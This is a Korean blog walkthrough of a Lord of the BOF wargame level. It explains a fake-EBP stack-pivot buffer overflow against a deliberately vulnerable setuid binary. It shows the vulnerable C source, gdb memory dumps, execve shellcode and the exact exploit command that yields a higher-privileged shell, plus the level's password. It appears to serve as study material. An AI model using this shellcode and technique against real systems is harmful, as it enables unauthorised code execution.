2017. 11. 20. 21:09ㆍSystemHacking/LOB(BOF원정대)
assassin / pushing me away
[assassin@localhost assassin]$ /bin/bash2
[assassin@localhost assassin]$ export SHELL=/bin/bash2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { char buffer[40]; if(argc < 2){ printf("argv error\n"); exit(0); } if(argv[1][47] == '\xbf') { printf("stack retbayed you!\n"); exit(0); } if(argv[1][47] == '\x40') { printf("library retbayed you, too!!\n"); exit(0); } // strncpy instead of strcpy! strncpy(buffer, argv[1], 48); printf("%s\n", buffer); } | cs |
hint : Fake EBP
[ Stack ]
buffer 40byte
saved ebp 4byte
saved eip 4byte <-- no stack,no RTL
[ Stack ] : Fake EBP 공격
buffer &shellcode
saved ebp &buffer+4
saved eip &leaveret
....
1> main leave
mov esp,ebp
pop ebp => EBP: Fake EBP
2> main ret
pop eip => EIP: &leaveret
3> leave
mov esp,ebp => ESP: Fake EBP(&buffer+4)
pop ebp => EBP: &buffer+4에 있는 값
4> ret
pop eip => EIP: &buffer
* &leaveret
0x80484df <main+159>: leave
* 24byte shellcode
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
[ gdb 분석 ]
[assassin@localhost assassin]$ cp zombie_assassin zombie_assassin.cp
[assassin@localhost assassin]$ gdb -q zombie_assassin.cp
(gdb) set disassembly-flavor intel
(gdb) disas main
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %ebp,%esp
0x8048443 <main+3>: sub %esp,40
... (생략) ...
0x80484df <main+159>: leave
(gdb) run $(python -c 'print "\x90" * 16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "BBBB" + "CCCC"')
Breakpoint 1, 0x80484df in main ()
(gdb) x/24x $ebp-40
0xbffffaa0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffab0: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
fake ebp saved eip
0xbffffac0: 0x99e18953 0x80cd0bb0 0x42424242 0x43434343
0xbffffad0: 0x00000002 0xbffffb14 0xbffffb20 0x40013868
* fake ebp 지점의 값을 0xbffffaa0 - 4 로 변조
* saved eip 지점의 값은 &leaveret 주소로 변조
$(python -c 'print "\x90" * 16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x9c\xfa\xff\xbf" + "\xdf\x84\x04\x08"')
[ Payload 작성 ]
* &leaveret
0x80484df <main+159>: leave
* 24byte shellcode
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
=> 주소값 보정작업 : fake ebp값이 조금 변했다
[assassin@localhost assassin]$./zombie_assassin $(python -c 'print "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x98\xfa\xff\xbf" + "\xdf\x84\x04\x08"')
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒Ph//shh/bin▒▒PS▒ᙰ
̀▒▒▒▒߄
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$
'SystemHacking > LOB(BOF원정대)' 카테고리의 다른 글
| [19] nightmare -> xavius (0) | 2017.11.25 |
|---|---|
| [17] zombie_assassin -> succubus ( Calling Function Continuously ) (0) | 2017.11.25 |
| [15] giant -> assassin ( Data Section ( leave & ret ) ) (0) | 2017.11.20 |
| [14] bugbear -> giant ( RTL , execve ) (0) | 2017.11.20 |
| [13] darkknight -> bugbear ( RTL ( Return To Library ) ) (0) | 2017.11.17 |